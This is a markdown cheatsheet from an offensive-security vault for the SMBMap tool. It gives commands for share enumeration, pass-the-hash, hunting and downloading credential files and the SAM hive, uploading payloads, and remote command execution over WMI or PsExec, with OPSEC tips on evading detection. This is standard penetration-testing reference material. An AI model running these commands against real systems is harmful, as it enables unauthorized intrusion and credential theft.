daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

smbmap.md (12035B)


      1 ---
      2 title: "SMBMap"
      3 description: "SMBMap share enumeration, permissions mapping, file download/upload and command execution over SMB."
      4 category: enumeration
      5 tags: [enumeration, smb, shares]
      6 tools: [SMBMap]
      7 difficulty: beginner
      8 updated: "2026-08-09"
      9 source: "vault:Enumeration/SMBMAP.md"
     10 ---
     11 
     12 # SMBMap
     13 
     14 SMBMap enumerates SMB shares and permissions (READ/WRITE/NO ACCESS), lists and downloads files, and can execute commands across single hosts or a network range. Requires Python 3 (`pip3 install smbmap` or the Kali package). Version referenced: v1.10.7.
     15 
     16 ## Share Enumeration (authenticated & null session)
     17 
     18 Enumerate shares, permissions, and host metadata. Needs port 445 reachable.
     19 
     20 ```bash
     21 # Null session (anonymous)
     22 smbmap -H 192.168.1.10
     23 
     24 # Authenticated with password
     25 smbmap -u jsmith -p 'Password1!' -d CORP -H 192.168.1.10
     26 
     27 # Pass-the-Hash (NTLM)
     28 smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' -H 192.168.1.10
     29 
     30 # Host-file sweep (IPs, FQDNs, or CIDR accepted)
     31 smbmap --host-file targets.txt -u jsmith -p 'Password1!' -d CORP
     32 
     33 # Check admin access only
     34 smbmap -u jsmith -p 'Password1!' -H 192.168.1.10 --admin
     35 
     36 # Check SMB signing status
     37 smbmap -u jsmith -p 'Password1!' -H 192.168.1.10 --signing
     38 
     39 # Return OS version
     40 smbmap -u jsmith -p 'Password1!' -H 192.168.1.10 -v
     41 ```
     42 
     43 **Auth & enumeration flags:**
     44 
     45 | Flag | Description | Default |
     46 |---|---|---|
     47 | `-H HOST` | Target IP or FQDN | — |
     48 | `--host-file FILE` | File of hosts (IP/FQDN/CIDR) | — |
     49 | `-u USERNAME` | Username; omit for null session | null |
     50 | `-p PASSWORD` | Plaintext or `LMHASH:NTHASH` | — |
     51 | `--prompt` | Prompt for password (avoids shell history) | off |
     52 | `-d DOMAIN` | Domain name | WORKGROUP |
     53 | `-P PORT` | SMB port | 445 |
     54 | `-v` | Return remote OS version | off |
     55 | `--admin` | Report if user is admin only | off |
     56 | `--signing` | Check SMB signing state | off |
     57 | `--no-write-check` | Skip write permission check (quieter) | off |
     58 | `--timeout SEC` | Socket connect timeout | 0.5s |
     59 | `--no-banner` | Suppress banner | off |
     60 | `--no-color` | Suppress colour output | off |
     61 
     62 ```bash
     63 # PtH against an entire /24
     64 smbmap --host-file hosts.txt -u admin -p 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c' -d CORP
     65 
     66 # Suppress write check for stealth (fewer WRITE probes)
     67 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --no-write-check -q
     68 
     69 # Output to CSV for reporting
     70 smbmap -u jsmith -p 'Password1!' --host-file targets.txt --csv results.csv
     71 ```
     72 
     73 **Output interpretation:**
     74 - `ADMIN!!!` next to host → current user has admin privileges.
     75 - `READ, WRITE` → full access; high value for lateral movement or payload staging.
     76 - `NO ACCESS` → share visible but inaccessible.
     77 - `READ ONLY` → can list/download, cannot write.
     78 
     79 **OPSEC:** every connection creates Windows Event ID **4624** (logon) and **4648** (explicit creds); **4776** for NTLM auth. The write check attempts a dummy directory create (visible in the Security log). Default WMI execution mode (`-x`) spawns WMI activity → **4688**/Sysmon **1**. Host-file sweeps produce rapid multi-host auth attempts that will trip lockout policies and brute-force detections if creds are wrong.
     80 
     81 ## Directory & File Listing
     82 
     83 Recursively enumerate share contents. Needs READ access; deeper traversal of admin shares (`C$`, `ADMIN$`) may require elevated creds.
     84 
     85 ```bash
     86 # List root of ALL shares
     87 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r
     88 
     89 # Recurse into a specific path
     90 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'Finance/Payroll'
     91 
     92 # Set depth of traversal (default: 1)
     93 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r --depth 5
     94 
     95 # List directories only (no files)
     96 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r --dir-only
     97 
     98 # List all local drives (requires admin)
     99 smbmap -u administrator -p 'Password1!' -H 10.10.10.10 -L
    100 
    101 # Exclude noisy default shares
    102 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r --exclude ADMIN$ IPC$ print$
    103 ```
    104 
    105 | Flag | Description | Default |
    106 |---|---|---|
    107 | `-r [PATH]` | Recursive list; no path = all share roots | all shares |
    108 | `--depth N` | Max traversal depth | 1 |
    109 | `--dir-only` | Omit files, show directories only | off |
    110 | `--exclude SHARE…` | Skip named shares | none |
    111 | `-L` | List local drives (admin required) | off |
    112 | `-g FILE` | Grep-friendly output file (used with `-r`) | none |
    113 | `--csv FILE` | CSV output | none |
    114 | `-q` | Quiet: show only READ/WRITE shares | off |
    115 
    116 ```bash
    117 # Full recursive enum of a share, output to grep file
    118 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'Users' --depth 4 -g users_out.txt
    119 
    120 # Quiet CSV output across subnet
    121 smbmap -u jsmith -p 'Password1!' --host-file targets.txt -r --csv shares.csv -q
    122 ```
    123 
    124 Look for `.config`, `.xml`, `.kdbx`, `.ps1`, `.bat`, `id_rsa`, `web.config`, `*.bak`. Deep recursion (`--depth > 3`) generates high SMB read volume (detectable by DLP/EDR); scope to a single share to reduce noise. `STATUS_ACCESS_DENIED` → creds lack access; try admin creds.
    125 
    126 ## File Pattern Matching & Auto-Download
    127 
    128 Search share filenames by regex and auto-download matches. Requires `-r`; patterns are case-insensitive.
    129 
    130 ```bash
    131 # Auto-download all config/web files
    132 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r -A '(web|global)\.(asax|config)'
    133 
    134 # Find and grab any file with "password"/"cred" in the name
    135 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r -A '(password|cred|secret|pass)' --depth 5
    136 
    137 # Match backup or KeePass files
    138 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r -A '\.(kdbx|bak|old|zip|7z)$' --depth 6 -q
    139 ```
    140 
    141 | Flag | Description | Default |
    142 |---|---|---|
    143 | `-A PATTERN` | Regex for filename match; auto-downloads on hit (requires `-r`) | off |
    144 | `-r [PATH]` | Required with `-A` | — |
    145 | `--depth N` | How deep to search | 1 |
    146 | `-q` | Suppress non-matching output | off |
    147 
    148 ```bash
    149 # Hunt for SSH keys and certs
    150 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'Users' -A '(id_rsa|\.pem|\.pfx|\.p12|\.ppk)' --depth 6 -q
    151 
    152 # Grab PowerShell and batch scripts
    153 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'NETLOGON' -A '\.(ps1|bat|cmd|vbs)$' --depth 4
    154 ```
    155 
    156 Matched files download to the current directory as `[hostname]_[share]_[filename]`. No downloads despite hits → check write perms on your CWD. Test regex separately: `python3 -c "import re; re.compile('PATTERN')"`.
    157 
    158 ## File Content Search (`-F`)
    159 
    160 Search the *content* of remote files via regex, executed through PowerShell on the victim. Requires admin creds, PowerShell on target, and running smbmap as **root** (experimental feature).
    161 
    162 ```bash
    163 # Search for password strings in C:\Users (default path)
    164 sudo smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 -F '[Pp]assword'
    165 
    166 # Search a specific drive/path
    167 sudo smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 -F '[Pp]assword' --search-path 'D:\HR\'
    168 
    169 # Extend timeout for large drives (default 300s)
    170 sudo smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 -F 'api.key|secret' --search-timeout 600
    171 ```
    172 
    173 | Flag | Description | Default |
    174 |---|---|---|
    175 | `-F PATTERN` | Regex to search file contents | — |
    176 | `--search-path PATH` | Drive/path to search | `C:\Users` |
    177 | `--search-timeout SEC` | Kill job after N seconds | 300 |
    178 
    179 > **Warning — `-F` is the noisiest smbmap feature.** It drops and deletes a temp `.txt` under `C:\Temp\` (Sysmon EID 11/23), triggers PowerShell script-block logging (**4104**) and process creation (**4688**), and touches admin shares (**5140/5145**). Avoid in engagements with mature EDR/SIEM.
    180 
    181 ## File Upload / Download / Delete
    182 
    183 Transfer files to/from shares or delete remote files. Needs WRITE for upload/delete, READ for download.
    184 
    185 ```bash
    186 # Download a file
    187 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --download 'C$\Users\jsmith\Desktop\passwords.txt'
    188 
    189 # Upload a file
    190 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --upload '/tmp/payload.exe' 'C$\Temp\payload.exe'
    191 
    192 # Delete a file (prompts confirmation)
    193 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --delete 'C$\Temp\payload.exe'
    194 
    195 # Delete without confirmation prompt
    196 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --delete 'C$\Temp\payload.exe' --skip
    197 ```
    198 
    199 | Flag | Description |
    200 |---|---|
    201 | `--download PATH` | Remote path in `SHARE\path\file` format |
    202 | `--upload SRC DST` | Local src path, then remote `SHARE\path\file` |
    203 | `--delete PATH` | Remote path to delete |
    204 | `--skip` | Skip delete confirmation |
    205 
    206 ```bash
    207 # Grab SAM hive backup
    208 smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 --download 'C$\Windows\Repair\SAM'
    209 
    210 # Stage a tool to a writable share, then clean up
    211 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --upload '/opt/tools/tool.exe' 'Data\tool.exe'
    212 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --delete 'Data\tool.exe' --skip
    213 ```
    214 
    215 **OPSEC:** writes to admin shares (`C$`) generate **5145** and **4663**; uploading executables to `C$\Temp\` is a high-confidence IOC (AV/EDR scans on write). Prefer writable non-admin shares. `STATUS_ACCESS_DENIED` on upload → share is READ only or path doesn't exist (create the directory first).
    216 
    217 ## Remote Command Execution
    218 
    219 Execute commands via WMI (default) or PsExec over SMB. Requires admin creds; WMI needs port 445 + DCOM ports open.
    220 
    221 ```bash
    222 # Execute command via WMI (default)
    223 smbmap -u administrator -p 'P@ssw0rd' -d CORP -H 10.10.10.10 -x 'whoami'
    224 
    225 # Execute via PsExec
    226 smbmap -u administrator -p 'P@ssw0rd' -d CORP -H 10.10.10.10 -x 'whoami' --mode psexec
    227 
    228 # Domain group enumeration
    229 smbmap -u administrator -p 'P@ssw0rd' -d CORP -H 10.10.10.10 -x 'net group "Domain Admins" /domain'
    230 
    231 # PtH command exec
    232 smbmap -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c' -H 10.10.10.10 -x 'ipconfig /all'
    233 ```
    234 
    235 | Flag | Description | Default |
    236 |---|---|---|
    237 | `-x COMMAND` | Command string to execute | — |
    238 | `--mode CMDMODE` | `wmi` or `psexec` | `wmi` |
    239 
    240 Output is returned inline (no interactive shell); empty output often means the command ran with no stdout. WMI → **4688**/Sysmon **1** + WMI-Activity/Operational log. PsExec → creates a service (**7045**, very high-fidelity). Prefer WMI for a lower footprint. No output returned → WMI may be firewalled (TCP 135 + dynamic RPC); try `--mode psexec`.
    241 
    242 ## Kerberos Authentication
    243 
    244 Authenticate to shares with Kerberos tickets (Pass-the-Ticket / ccache). Needs a valid `.ccache`, `KRB5CCNAME` set, and the DC reachable by FQDN (marked "super beta" by the developer).
    245 
    246 ```bash
    247 # Set ccache path and use Kerberos auth (no password)
    248 export KRB5CCNAME='/tmp/jsmith.ccache'
    249 smbmap -k --no-pass -H dc01.corp.local -d CORP --dc-ip 10.10.10.1
    250 
    251 # Kerberos with username (overpass-the-hash scenarios)
    252 export KRB5CCNAME='/tmp/jsmith.ccache'
    253 smbmap -k -u jsmith -H fileserver.corp.local -d CORP --dc-ip 10.10.10.1
    254 ```
    255 
    256 | Flag | Description |
    257 |---|---|
    258 | `-k` / `--kerberos` | Enable Kerberos authentication |
    259 | `--no-pass` | Use ccache only (no password prompt) |
    260 | `--dc-ip IP/Host` | IP or FQDN of Domain Controller |
    261 
    262 Kerberos avoids sending NTLM hashes over the wire (no NTLM-relay signal) but still generates **4624** (logon type 3) and **4769** (service ticket) on the DC.
    263 
    264 > **Note — Common errors.** `Kerberos SessionError` → clock skew > 5 min, sync with `ntpdate`/`faketime`. Must use the FQDN (`-H dc01.corp.local`), not the IP — SPN resolution fails on a raw IP. If `KRB5CCNAME` is unset the tool may silently fall back to NTLM; always verify the env var.
    265 
    266 ## Version / Platform Notes
    267 
    268 - Requires Python 3; legacy Python 2 support dropped.
    269 - `--signing` was added in recent versions; not present in older Kali packages.
    270 - `-A` (filename pattern auto-download) requires `-r`; use lowercase `-r` (mixing with the old `-R` flag can error on newer installs).
    271 - On Kali, the system package may lag behind PyPI; prefer `pip3 install --upgrade smbmap` for the latest.
    272 - `--host-file` accepts IPs, FQDNs, and CIDR notation.
    273 
    274 ## Sources
    275 
    276 - https://github.com/ShawnDEvans/smbmap
    277 - https://manpages.debian.org/bookworm/smbmap/smbmap.1.en.html
    278 - https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/